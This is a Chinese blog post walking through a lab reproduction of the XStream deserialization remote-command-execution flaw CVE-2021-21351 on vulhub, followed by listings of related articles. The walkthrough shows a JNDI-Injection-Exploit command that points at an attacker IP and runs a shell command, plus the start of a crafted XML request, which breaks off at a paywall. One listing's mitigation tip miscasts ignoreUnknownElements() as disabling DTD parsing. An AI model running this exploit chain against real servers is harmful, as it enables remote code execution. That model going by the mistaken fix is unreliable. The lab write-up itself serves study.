XStream 反序列化远程命令执行漏洞复现(CVE-2021-21351)

最新推荐文章于 2024-06-05 16:45:01 发布
最新推荐文章于 2024-06-05 16:45:01 发布
阅读量5.6k 收藏
点赞数 1
分类专栏: 安全 文章标签: 安全漏洞 渗透测试 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43223153/article/details/123837976
版权

XStream 反序列化远程命令执行漏洞复现

1. 漏洞影响版本
XStream <= 1.4.15
2. 环境搭建
安装漏洞靶场vulhub

git clone git://github.com/vulhub/vulhub.git

3. 漏洞复现
1 进入到漏洞环境文件夹,启动漏洞环境。

cd /vulhub/xstream/CVE-2021-21351
docker-compose up -d

2 启动好之后,访问靶机的ip加8080端口
在这里插入图片描述
3 下载JNDI注入利用工具:

下载地址:https://github.com/welk1n/JNDI-Injection-Exploit/releases

4 打开burp,设置好代理,抓包

  1. 设置代理
    在这里插入图片描述
    在这里插入图片描述
  2. 设置好代理之后,访问网站进行抓包(可以右键发送到Repeater)
    在这里插入图片描述

5 启动下载的JNDI注入利用工具(复制出图中红框中的信息)

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/123.txt" -A 10.44.28.91
注意: -A的地址填写攻击机的IP,也就是你的PC主机。

在这里插入图片描述
6 修改请求的数据包:将第5步复制出来的信息粘贴到< dataSource>这一行中。

POST / HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: application/xml
Content-Length: 3182

<sorted-set>
  <javax.naming.ldap.Rdn_-RdnEntry>
    <type>ysomap&l
最低0.47元/天 解锁文章
月光下的她很美
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CVE-2021-21351 XStream反序列化远程代码执行漏洞
m0_56642842的博客
08-13 2575
0x00 简介 XStreamJava类库,用来将对象序列化成XML (JSON)或反序列化为对象。XStream是自由软件,可以在BSD许可证的许可下分发。它是一种OXMapping 技术,是用来处理XML文件序列化的框架在将javaBean序列化,或将XML文件反序列化的时候,不需要其它辅助类和映射文件,使得XML序列化不再繁琐。 0x01 漏洞概述 在 1.4.16 版本之前的 XStream 中,存在一个漏洞,允许远程攻击者仅通过操纵处理后的输入流,解组时处理的流包含类型信息以重新创建以前编写的对
CVE-2021-21351-Stream 反序列化命令执行漏洞复现
weixin_59086772的博客
12-02 623
今天雨笋教育小编给大家介绍,XStream是一个简单易用的开源java类库,在解析XML文本时使用黑名单机制来防御反序列化漏洞,但之前的版本黑名单存在缺陷所以造成反序列化命令执行错误,下午具体来看一下复现过程吧。 0x00简介 XStream是一个轻量级、简单易用的开源Java类库, 它主要用于将对象序列化成XML(JSON)或反序列化为对象。 0x01漏洞概述 XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞, 但是其 1.4.15 及之前版本黑名单存在缺陷, 攻击者可
XStream 反序列化命令执行漏洞CVE-2021-21351
EC_Carrot的博客
08-21 1091
漏洞简介 XStream是一个轻量级、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。 XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.15 及之前版本黑名单存在缺陷,攻击者可利用javax.naming.ldap.Rdn$RdnEntry及javax.sql.rowset.BaseRowSet构造JNDI注入,进而执行任意命令漏洞复现 由于目标环境Java版本高于8u191,所以我们需要使用org.apache.naming.
xstream-1.4.15.jar
01-28
XStream 反序列化漏洞CVE-2020-26258 & 26259),修复jar包 xstream-1.4.15.jar XstreamJava 类库,用来将对象序列化成 XML (JSON) 或反序列化为对象。XStream 是一款开源软件,允许在 BSD 许可证的许可下分发。 0x01 漏洞描述 Xstream上次对CVE-2020-26217处理并不彻底,虽然通过黑名单方法阻止了远程代码执行,但是仍然可以采用类似思路实现文件删除与服务器请求伪造。 影响版本 Xstream = 1.4.15 风险等级 严重
XStream反序列化
最新发布
2301_79724395的博客
06-05 1265
这里其实只分析了基础的,后面很多cve都已经不使用这种方式打了,我主要就是了解一下这个漏洞基础解析XML:首先,XStream使用内部的HierarchicalStreamReader(这可能是基于StAX,Xpp,JDOM等的实现)开始解析XML。HierarchicalStreamReader会从XML的开头开始顺序读取所有的元素,并提供读取节点名称,节点值,属性等所有必要的方法。查找对应的Converter:对于每一个读取到的节点,XStream会通过Mapper找到对应的Converter。
xstream-cve_2021_21351反序列化漏洞复现
whj_study的博客
01-19 2978
# 漏洞名称: xstream-cve_2021_21351 ## 漏洞简介 * Stream是Java类库,用来将对象序列化成XML (JSON)或反序列化为对象。XStream是自由软件,可以在BSD许可证的许可下分发。它是一种OXMapping 技术,是用来处理XML文件序列化的框架在将javaBean序列化,或将XML文件反序列化的时候,不需要其它辅助类和映射文件,使得XML序列化不再繁琐。在 1.4.16 版本之前的 XStream 中,存在一个漏洞,允许远程攻击者仅通过操纵处理后的输入流,解
XStream 反序列化命令执行漏洞复现CVE-2021-21351
Vitaminapple的博客
04-19 531
XStream是一个轻量级、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.15 及之前版本黑名单存在缺陷,攻击者可利用javax.naming.ldap.Rdn$RdnEntry及javax.sql.rowset.BaseRowSet构造JNDI注入,进而执行任意命令
腾讯蓝军安全通告|XStream远程代码执行漏洞(CVE-2021-29505).pdf
09-18
XStream远程代码执行漏洞(CVE-2021-29505)】是腾讯蓝军发布的安全通告中的一个重要安全事件,涉及到一个高风险的软件漏洞XStream是一款广泛使用的Java XML序列化库,它允许将Java对象转换为XML格式的数据,反之...
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
XStream1.4.16反序列化漏洞CVE-2020-26258、CVE-2020-26259)
05-08
XStream是一个常用的Java对象和XML相互转换的工具。...攻击者通过构造恶意的XML文档,可绕过XStream的黑名单,触发反序列化,从而造成CVE-2020-26258 SSRF漏洞,以及 CVE-2020-26259 任意文件删除漏洞
xstream 远程代码执行CVE-2021-29505)
YouthBelief的博客
11-14 1362
这里写目录标题0x01 漏洞描述0x02 影响范围0x03 漏洞复现环境搭建0x04 漏洞修复 0x01 漏洞描述 0x02 影响范围 0x03 漏洞复现 环境搭建 0x04 漏洞修复
java XStream更新
编程技术提升
03-29 2972
漏洞详情 XStream 是一个常用的 Java 对象和 XML 相互转换的工具。近日 XStream 官方发布安全更新,修复了高危和严重漏洞如下: Version 1.4.17 CVE-2021-39139 任意代码执行漏洞 CVE-2021-39140 可能导致拒绝服务 CVE-2021-39141 任意代码执行漏洞 CVE-2021-39144 远程命令执行漏洞 CVE-2021-39145 任意代码执行漏洞 CVE-2021-39146 任意代码执行漏洞 CVE-2021-39147 任意代码执行
XStream 高危漏洞合集,XStream 组件反序列化漏洞
weixin_45314962的博客
11-27 2028
CVE-2021-29505反序列化代码执行漏洞
【WEB安全】Xstream最新反序列化poc执行报错问题
dzqxwzoe的博客
01-08 398
最近有个需求,用Xstream反序列化打个内存马,从通用性来讲,肯定用1.4.17的洞去打应用范围最广。众所周知,Xstream官方会提供其漏洞的poc。在我实验之下,1.4.17的几个poc只要涉及到任意java代码执行的都会报错,纯调用java.lang.Runtime.exec()的却不会报错。在我调试之下发现了其奥秘,本文就是解决Xstream任意java代码执行报错的问题。
XStream 反序列化漏洞 (CVE-2020-26258 & 26259) 的复现与分析
smellycat000的专栏
12-16 3679
聚焦源代码安全,网罗国内外最新资讯!XstreamJava 类库,用来将对象序列化成 XML (JSON) 或反序列化为对象。XStream 是一款开源软件,允许在 BSD 许可...
jar包依赖漏洞升级思路
qq_32590535的博客
06-21 2342
jar包漏洞升级常见思路和处理流程
vulhub漏洞复现75_XStream
weixin_44193247的博客
02-13 489
vulhub漏洞复现练习篇
XStream漏洞编号是 CVE-2021-21351的应对措施
06-11
XStream漏洞编号 CVE-2021-21351 是由于 XStream 序列化时对恶意 XML 转换导致的安全漏洞。以下是一些应对措施: 1. 尽可能升级 XStream 的版本到 1.4.16 或更高版本,因为这些版本已经修复了该漏洞。 2. 如果无法升级到最新版本,可以通过在 XStream 实例中禁用 DTD 解析来缓解此漏洞。可以通过以下代码实现: ``` XStream xstream = new XStream(); xstream.ignoreUnknownElements(); ``` 3. 可以通过限制可反序列化的类或使用安全的转换器来减少攻击面。 4. 将 XStream 序列化作为一个不可信的输入,始终对其进行适当的验证和过滤。 5. 使用其他序列化库,例如 Jackson 或 Gson,来代替 XStream。 以上是一些常见的应对措施,但实际上解决此漏洞的最好方法是升级 XStream 到最新版本。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值